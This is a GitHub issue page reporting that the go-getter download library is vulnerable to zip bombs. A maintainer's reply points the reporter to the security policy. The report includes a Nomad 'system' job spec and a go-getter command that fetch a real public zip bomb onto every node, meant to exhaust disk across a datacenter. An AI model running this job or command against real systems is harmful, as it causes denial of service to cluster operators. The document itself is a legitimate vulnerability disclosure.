search

hashicorp / go-getter

Package for downloading things from a string URL using a variety of protocols.
Mozilla Public License 2.0
1.62k stars 226 forks source link

Vulnerable to Zip bombs. #407

Closed jboero closed 1 year ago

jboero commented 1 year ago

Zip bombs or compression bombs are trick archives that are custom structured to generate Terabytes of garbage (or zeros) from a small archive. It turns out go-getter's decompression options and detectors are susceptible to this. This is behaviour by design but it might be a good idea if go-getter verified an archive's size will fit in storage before decompression. This doesn't just apply to zip files but also xz, zstd, etc. Downloading a zip bomb today is actually detected and block by Chrome and some browsers to prevent you from accidentally filling your partition.

A crafty Nomad job of type "system" could instantly bring down an entire Nomad DC if the artifact is downloaded to all nodes and expanded to fill all storage. This pseudojob is missing the exec driver.

job "bomb" {
  type = "system"
  datacenters = ["dc1"]
  group "artifacts" {
    task "server" {
      artifact {
        source      = "https://www.bamsoftware.com/hacks/zipbomb/zblg.zip"
        destination = "/tmp/some-directory"
        options {
          checksum = "md5:207b597f03033b2e0644bbbc29f04053"
        }
      }
    }
  }
}

Beware zip bombs and please use caution if trying to reproduce this: https://www.bamsoftware.com/hacks/zipbomb/

$ ~/go/bin/go-getter https://www.bamsoftware.com/hacks/zipbomb/zblg.zip /tmp/
2023/01/19 13:11:00 Error downloading: write /tmp/1: no space left on device
picatz commented 1 year ago

👋 Hello @jboero! In the future, please follow our documented security policy to report vulnerabilities.